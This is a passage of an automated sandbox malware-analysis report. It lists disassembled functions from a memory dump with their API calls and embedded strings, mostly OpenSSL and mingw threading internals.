a_mbstr.c, xrefs: 004BB1F6, 004BB2D2, 004BB348, 004BB470, 004BB4CB, 004BB501, 004BB56C, 004BB5F8, 004BB662
|, xrefs: 004BB66F
%ld, xrefs: 004BB599, 004BB620
minsize=, xrefs: 004BB641
maxsize=, xrefs: 004BB5B5
z, xrefs: 004BB677
t, xrefs: 004BB4F9

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0044B6C0, Relevance: 12.3, APIs: 3, Strings: 5, Instructions: 281

APIs

strlen.MSVCRT ref: 0044B773
memcpy.MSVCRT ref: 0044B853

Part of subcall function 004300C0: memset.MSVCRT ref: 0043013E

strncpy.MSVCRT ref: 0044BADA

Strings

A, xrefs: 0044BA51
t, xrefs: 0044BA59
NO X509_NAME, xrefs: 0044BAD2
x509_obj.c, xrefs: 0044B9F8, 0044BA49
{, xrefs: 0044BA37

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00408D82, Relevance: 12.3, APIs: 7, Strings: 1, Instructions: 272

APIs

memcpy.MSVCRT ref: 00408DFB
memcpy.MSVCRT ref: 00408EEA
memcpy.MSVCRT ref: 00408F85
memcpy.MSVCRT ref: 004090D1
memcpy.MSVCRT ref: 00409151
memcpy.MSVCRT ref: 00409186
memcpy.MSVCRT ref: 004091FA

Strings

e_aes.c, xrefs: 00409060, 00409116

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 00407A50, Relevance: 12.3, APIs: 3, Strings: 5, Instructions: 252

APIs

memcpy.MSVCRT ref: 00407CBE
memcpy.MSVCRT ref: 00407CD9
memcpy.MSVCRT ref: 00407DED

Part of subcall function 00413910: raise.MSVCRT ref: 0041393E
Part of subcall function 00413910: _exit.MSVCRT ref: 0041394A

Strings

A, xrefs: 00407E84
evp_enc.c, xrefs: 00407B34, 00407BCC, 00407CEB, 00407D20, 00407D5C, 00407E30, 00407E49, 00407E7C
ctx->cipher->block_size == 1 || ctx->cipher->block_size == 8 || ctx->cipher->block_size == 16, xrefs: 00407B24
{, xrefs: 00407E8C
EVP_CIPHER_CTX_iv_length(ctx) <= (int)sizeof(ctx->iv), xrefs: 00407E20

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004D6260, Relevance: 12.2, APIs: 8, Instructions: 154

APIs

Part of subcall function 004E3AC0: fprintf.MSVCRT ref: 004E3B12
Part of subcall function 004E3AC0: realloc.MSVCRT ref: 004E3CC9
Part of subcall function 004E3AC0: memset.MSVCRT ref: 004E3CF3

Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E2560
Part of subcall function 004E2510: WaitForSingleObject.KERNEL32 ref: 004E25A2
Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,004E7324,?,?,?,005704F9,?,?,?,?,00000001), ref: 004E25C5
Part of subcall function 004E2510: CreateEventA.KERNEL32 ref: 004E260F
Part of subcall function 004E2510: CloseHandle.KERNEL32 ref: 004E262E
Part of subcall function 004E2510: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E263C

Part of subcall function 004E2810: GetCurrentThreadId.KERNEL32 ref: 004E2867
Part of subcall function 004E2810: SetEvent.KERNEL32 ref: 004E2896

Part of subcall function 004E3E10: GetLastError.KERNEL32 ref: 004E3E1B
Part of subcall function 004E3E10: SetLastError.KERNEL32 ref: 004E3E54

calloc.MSVCRT ref: 004D6301
abort.MSVCRT ref: 004D6457

Part of subcall function 004E3E80: GetLastError.KERNEL32 ref: 004E3E8B
Part of subcall function 004E3E80: SetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,004D6326), ref: 004E3ECC
Part of subcall function 004E3E80: realloc.MSVCRT ref: 004E3EF4
Part of subcall function 004E3E80: realloc.MSVCRT ref: 004E3F0F
Part of subcall function 004E3E80: memset.MSVCRT ref: 004E3F40
Part of subcall function 004E3E80: memset.MSVCRT ref: 004E3F5F

malloc.MSVCRT ref: 004D6344
memcpy.MSVCRT ref: 004D636C
realloc.MSVCRT ref: 004D639E
memset.MSVCRT ref: 004D63CB
malloc.MSVCRT ref: 004D63FB
memset.MSVCRT ref: 004D644B

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004320D0, Relevance: 10.8, APIs: 1, Strings: 6, Instructions: 254

APIs

strlen.MSVCRT ref: 00432248

Part of subcall function 00431FB0: memcpy.MSVCRT ref: 004320B7

Strings

RX, xrefs: 00432236, 0043228A, 004322A9
0123456789abcdef, xrefs: 004321B7
0123456789ABCDEF, xrefs: 004321A2
, xrefs: 0043219A
, xrefs: 00432489
, xrefs: 00432458

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0043E370, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 233

APIs

Part of subcall function 00416CD0: memcpy.MSVCRT ref: 00416D3E
Part of subcall function 00416CD0: strlen.MSVCRT ref: 00416D6D
Part of subcall function 00416CD0: memcpy.MSVCRT ref: 00416DA9
Part of subcall function 00416CD0: strlen.MSVCRT ref: 00416DC2
Part of subcall function 00416CD0: memcpy.MSVCRT ref: 00416DFD

isspace.MSVCRT ref: 0043E53B
isspace.MSVCRT ref: 0043E575
isspace.MSVCRT ref: 0043E5A1
isspace.MSVCRT ref: 0043E5C3
tolower.MSVCRT ref: 0043E629

Strings

x_name.c, xrefs: 0043E65F

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00464539, Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 213

APIs

memcmp.MSVCRT ref: 0046466B
memcmp.MSVCRT ref: 00464687
memcmp.MSVCRT ref: 004646A3
memcmp.MSVCRT ref: 004646F3

Part of subcall function 00433BA0: qsort.MSVCRT ref: 00433BD2

Part of subcall function 00463CE0: memcmp.MSVCRT ref: 00463E83
Part of subcall function 00463CE0: memcmp.MSVCRT ref: 00463EA3
Part of subcall function 00463CE0: memcmp.MSVCRT ref: 00463EBF
Part of subcall function 00463CE0: memcmp.MSVCRT ref: 00463F13
Part of subcall function 00463CE0: memcmp.MSVCRT ref: 00463F95

Part of subcall function 00413910: raise.MSVCRT ref: 0041393E
Part of subcall function 00413910: _exit.MSVCRT ref: 0041394A

memcmp.MSVCRT ref: 00464845

Strings

v3_addr_is_canonical(addr), xrefs: 004647D1
v3_addr.c, xrefs: 004647E1

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00448C90, Relevance: 10.7, APIs: 2, Strings: 5, Instructions: 167

APIs

strlen.MSVCRT ref: 00448CB7
strlen.MSVCRT ref: 00448D57

Part of subcall function 0049A3B0: memcpy.MSVCRT ref: 0049A46B
Part of subcall function 0049A3B0: memcpy.MSVCRT ref: 0049A51C
Part of subcall function 0049A3B0: memcpy.MSVCRT ref: 0049A542

Strings

pem_lib.c, xrefs: 00448CEC, 00448DAA
-----, xrefs: 00448D38, 00448F3A
-----END , xrefs: 00448EFA
r, xrefs: 00448CF4
-----BEGIN , xrefs: 00448CC4

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004064C0, Relevance: 10.6, APIs: 2, Strings: 5, Instructions: 105

APIs

strlen.MSVCRT ref: 0040653F
strchr.MSVCRT ref: 0040655E

Strings

reason(%lu), xrefs: 004065D9
func(%lu), xrefs: 0040658B
@, xrefs: 00406621
error:%08lX:%s:%s:%s, xrefs: 00406524
lib(%lu), xrefs: 00406616

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004300C0, Relevance: 10.6, APIs: 1, Strings: 6, Instructions: 70

APIs

memset.MSVCRT ref: 0043013E

Strings

buffer.c, xrefs: 00430109, 00430168, 004301A8
x, xrefs: 00430101
-----, xrefs: 004300C0
v, xrefs: 004301A0
z, xrefs: 00430195
d, xrefs: 00430178

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E4090, Relevance: 10.6, APIs: 7, Instructions: 69

APIs

Part of subcall function 004E32D0: TlsGetValue.KERNEL32 ref: 004E32ED
Part of subcall function 004E32D0: GetCurrentThreadId.KERNEL32 ref: 004E332B
Part of subcall function 004E32D0: CreateEventA.KERNEL32(?,?,?,?,?,?,?,00000000,00000004,004E3B61), ref: 004E3353
Part of subcall function 004E32D0: GetCurrentProcess.KERNEL32 ref: 004E3382
Part of subcall function 004E32D0: GetCurrentThread.KERNEL32 ref: 004E3386
Part of subcall function 004E32D0: GetCurrentProcess.KERNEL32 ref: 004E338E
Part of subcall function 004E32D0: DuplicateHandle.KERNEL32 ref: 004E33BA
Part of subcall function 004E32D0: GetThreadPriority.KERNEL32 ref: 004E33CD
Part of subcall function 004E32D0: TlsSetValue.KERNEL32 ref: 004E33F9
Part of subcall function 004E32D0: abort.MSVCRT ref: 004E340D

longjmp.MSVCRT ref: 004E40C1
TlsGetValue.KERNEL32(?,?,?,0000001C,004E426A,?,?,?,?,00000000,004E4352), ref: 004E40CE
CloseHandle.KERNEL32 ref: 004E40F5
_endthreadex.MSVCRT(?,?,?,?,0000001C,004E426A,?,?,?,?,00000000,004E4352), ref: 004E410C
CloseHandle.KERNEL32 ref: 004E4125
TlsSetValue.KERNEL32 ref: 004E414C
CloseHandle.KERNEL32 ref: 004E4166

Part of subcall function 004E2F90: free.MSVCRT(?,?,?,?,00000000,?,0021F85E,00000001,004E4187), ref: 004E2FBD
Part of subcall function 004E2F90: free.MSVCRT(?,?,?,?,00000000,?,0021F85E,00000001,004E4187), ref: 004E2FCC
Part of subcall function 004E2F90: free.MSVCRT(?,?,?,?,00000000,?,0021F85E,00000001,004E4187), ref: 004E2FDB
Part of subcall function 004E2F90: free.MSVCRT(?,?,?,?,00000000,?,0021F85E,00000001,004E4187), ref: 004E30AB
Part of subcall function 004E2F90: memmove.MSVCRT ref: 004E30EB

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E5370, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 34

APIs

fprintf.MSVCRT ref: 004E53DD
exit.MSVCRT ref: 004E53E9

Strings

Assertion failed: (%s), file %s, line %d, xrefs: 004E53CF
(, xrefs: 004E53B7
(((rwlock_t *)*rwl)->valid == LIFE_RWLOCK) && (((rwlock_t *)*rwl)->busy > 0), xrefs: 004E53C7
../mingw-w64/mingw-w64-libraries/winpthreads/src/rwlock.c, xrefs: 004E53BF

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 0040AB60, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 315

APIs

strlen.MSVCRT ref: 0040AE63

Strings

a_object.c, xrefs: 0040ADA4, 0040AE38, 0040AED8, 0040AF58, 0040AF89, 0040B048, 0040B079
k, xrefs: 0040B050
', xrefs: 0040ACC9
q, xrefs: 0040AF81
d, xrefs: 0040B089

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00448F80, Relevance: 9.3, APIs: 1, Strings: 5, Instructions: 303

APIs

strlen.MSVCRT ref: 00449186

Part of subcall function 004485A0: strlen.MSVCRT ref: 004485FD

Part of subcall function 00413910: raise.MSVCRT ref: 0041393E
Part of subcall function 00413910: _exit.MSVCRT ref: 0041394A

Part of subcall function 00407060: memcpy.MSVCRT ref: 0040712F
Part of subcall function 00407060: memcpy.MSVCRT ref: 004071EB
Part of subcall function 00407060: memcpy.MSVCRT ref: 00407222

Part of subcall function 00448C90: strlen.MSVCRT ref: 00448CB7
Part of subcall function 00448C90: strlen.MSVCRT ref: 00448D57

Part of subcall function 004483C0: strlen.MSVCRT ref: 004483DE
Part of subcall function 004483C0: memcpy.MSVCRT ref: 004483F7
Part of subcall function 004483C0: memset.MSVCRT ref: 0044848C
Part of subcall function 004483C0: strlen.MSVCRT ref: 004484A3
Part of subcall function 004483C0: fprintf.MSVCRT ref: 004484CE

Strings

o, xrefs: 004494D6
pem_lib.c, xrefs: 00448FC7, 00449080, 0044923B, 00449352, 00449378, 00449461, 004494CC
strlen(objstr) + 23 + 2 * enc->iv_len + 13 <= sizeof buf, xrefs: 00449451
i, xrefs: 004494DE
enc->iv_len <= (int)sizeof(iv), xrefs: 00449342

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00459710, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 138

APIs

strlen.MSVCRT ref: 0045993A

Part of subcall function 0040C4B0: memcpy.MSVCRT ref: 0040C519
Part of subcall function 0040C4B0: strlen.MSVCRT ref: 0040C567

strlen.MSVCRT ref: 004598B7

Strings

A, xrefs: 00459830
~, xrefs: 004598E3
@, xrefs: 004598C0
v3_sxnet.c, xrefs: 0045976D, 004597A8, 00459828, 004598D3

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 0045D2E9, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 136

APIs

strchr.MSVCRT ref: 0045D367
strncpy.MSVCRT ref: 0045D3EE

Strings

v3_info.c, xrefs: 0045D3C6, 0045D449, 0045D49D, 0045D4D8, 0045D529
value=, xrefs: 0045D500
A, xrefs: 0045D531
;, xrefs: 0045D35C

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 00438D40, Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 133

APIs

strlen.MSVCRT ref: 00438EF4

Part of subcall function 00430510: strlen.MSVCRT ref: 00430554

Strings

NULL, xrefs: 00438F1C
t, xrefs: 00438F7C
evp_pbe.c, xrefs: 00438D72, 00438EBB, 00438F39, 00438F6C
TYPE=, xrefs: 00438DBA
P, xrefs: 00438F14

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E2510, Relevance: 9.1, APIs: 6, Instructions: 103

APIs

Part of subcall function 004E24A0: malloc.MSVCRT ref: 004E24B0
Part of subcall function 004E24A0: free.MSVCRT(?,?,?,?,004E254A,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E24F1

GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E2560
WaitForSingleObject.KERNEL32 ref: 004E25A2
GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,004E7324,?,?,?,005704F9,?,?,?,?,00000001), ref: 004E25C5
CreateEventA.KERNEL32 ref: 004E260F
CloseHandle.KERNEL32 ref: 004E262E
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E263C

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E2F90, Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 95

APIs

Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E2560
Part of subcall function 004E2510: WaitForSingleObject.KERNEL32 ref: 004E25A2
Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,004E7324,?,?,?,005704F9,?,?,?,?,00000001), ref: 004E25C5
Part of subcall function 004E2510: CreateEventA.KERNEL32 ref: 004E260F
Part of subcall function 004E2510: CloseHandle.KERNEL32 ref: 004E262E
Part of subcall function 004E2510: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E263C

free.MSVCRT(?,?,?,?,00000000,?,778E7310,00000001,004E4187), ref: 004E2FBD
free.MSVCRT(?,?,?,?,00000000,?,778E7310,00000001,004E4187), ref: 004E2FCC
free.MSVCRT(?,?,?,?,00000000,?,778E7310,00000001,004E4187), ref: 004E2FDB

Part of subcall function 004E2810: GetCurrentThreadId.KERNEL32 ref: 004E2867
Part of subcall function 004E2810: SetEvent.KERNEL32 ref: 004E2896

free.MSVCRT(?,?,?,?,00000000,?,778E7310,00000001,004E4187), ref: 004E30AB
memmove.MSVCRT ref: 004E30EB

Strings

x#9, xrefs: 004E3041

Memory Dump Source

Source File: 00000005.00000002.557401570.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.557391743.00400000.00000002.sdmp
Associated: 00000005.00000002.557446489.00578000.00000004.sdmp
Associated: 00000005.00000002.557455791.0057B000.00000002.sdmp
Associated: 00000005.00000002.557480064.0061B000.00000004.sdmp
Associated: 00000005.00000002.557493260.00620000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_sync.jbxd

Function 004301C0, Relevance: 9.1, APIs: 2, Strings: 4, Instructions: 86

APIs

memset.MSVCRT ref: 00430254

Part of subcall function 004145F0: memcpy.MSVCRT ref: 0041467D

memset.MSVCRT ref: 0043027A

Strings

buffer.c, xrefs: 00430217, 00430298, 004302E8
-----END , xrefs: 004301C0
A, xrefs: 004302A0
i, xrefs: 004302A8

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E3E80, Relevance: 9.1, APIs: 6, Instructions: 83

APIs

GetLastError.KERNEL32 ref: 004E3E8B

Part of subcall function 004E32D0: TlsGetValue.KERNEL32 ref: 004E32ED
Part of subcall function 004E32D0: GetCurrentThreadId.KERNEL32 ref: 004E332B
Part of subcall function 004E32D0: CreateEventA.KERNEL32(?,?,?,?,?,?,?,00000000,00000004,004E3B61), ref: 004E3353
Part of subcall function 004E32D0: GetCurrentProcess.KERNEL32 ref: 004E3382
Part of subcall function 004E32D0: GetCurrentThread.KERNEL32 ref: 004E3386
Part of subcall function 004E32D0: GetCurrentProcess.KERNEL32 ref: 004E338E
Part of subcall function 004E32D0: DuplicateHandle.KERNEL32 ref: 004E33BA
Part of subcall function 004E32D0: GetThreadPriority.KERNEL32 ref: 004E33CD
Part of subcall function 004E32D0: TlsSetValue.KERNEL32 ref: 004E33F9
Part of subcall function 004E32D0: abort.MSVCRT ref: 004E340D

SetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,?,?,004D6326), ref: 004E3ECC
realloc.MSVCRT ref: 004E3EF4
realloc.MSVCRT ref: 004E3F0F
memset.MSVCRT ref: 004E3F40
memset.MSVCRT ref: 004E3F5F

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
Associated: 00000005.00000001.294798395.0061B000.00000004.sdmp
Associated: 00000005.00000001.294813487.0061F000.00000008.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_1_400000_sync.jbxd

Function 004E3AC0, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 198

APIs

Part of subcall function 004E2C10: calloc.MSVCRT ref: 004E2C50
Part of subcall function 004E2C10: calloc.MSVCRT ref: 004E2CA8

Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E2560
Part of subcall function 004E2510: WaitForSingleObject.KERNEL32 ref: 004E25A2
Part of subcall function 004E2510: GetCurrentThreadId.KERNEL32(?,?,?,?,?,?,004E7324,?,?,?,005704F9,?,?,?,?,00000001), ref: 004E25C5
Part of subcall function 004E2510: CreateEventA.KERNEL32 ref: 004E260F
Part of subcall function 004E2510: CloseHandle.KERNEL32 ref: 004E262E
Part of subcall function 004E2510: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,004E7324,?,?,?,005704F9), ref: 004E263C

fprintf.MSVCRT ref: 004E3B12
memset.MSVCRT ref: 004E3CF3

Part of subcall function 004E2810: GetCurrentThreadId.KERNEL32 ref: 004E2867
Part of subcall function 004E2810: SetEvent.KERNEL32 ref: 004E2896

Part of subcall function 004E2CC0: free.MSVCRT(?,?,00000000,00000004,004E32AD), ref: 004E2D38
Part of subcall function 004E2CC0: fprintf.MSVCRT ref: 004E2D5C

Part of subcall function 004E32D0: TlsGetValue.KERNEL32 ref: 004E32ED
Part of subcall function 004E32D0: GetCurrentThreadId.KERNEL32 ref: 004E332B
Part of subcall function 004E32D0: CreateEventA.KERNEL32(?,?,?,?,?,?,?,00000000,00000004,004E3B61), ref: 004E3353
Part of subcall function 004E32D0: GetCurrentProcess.KERNEL32 ref: 004E3382
Part of subcall function 004E32D0: GetCurrentThread.KERNEL32 ref: 004E3386
Part of subcall function 004E32D0: GetCurrentProcess.KERNEL32 ref: 004E338E
Part of subcall function 004E32D0: DuplicateHandle.KERNEL32 ref: 004E33BA
Part of subcall function 004E32D0: GetThreadPriority.KERNEL32 ref: 004E33CD
Part of subcall function 004E32D0: TlsSetValue.KERNEL32 ref: 004E33F9
Part of subcall function 004E32D0: abort.MSVCRT ref: 004E340D

realloc.MSVCRT ref: 004E3CC9

Strings

once %p is %d, xrefs: 004E3B04
p-N, xrefs: 004E3BC0, 004E3B7A

Memory Dump Source

Source File: 00000005.00000001.294562747.00401000.00000020.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000001.294557114.00400000.00000002.sdmp
Associated: 00000005.00000001.294585022.00578000.00000008.sdmp
Associated: 00000005.00000001.294681417.0057B000.00000002.sdmp
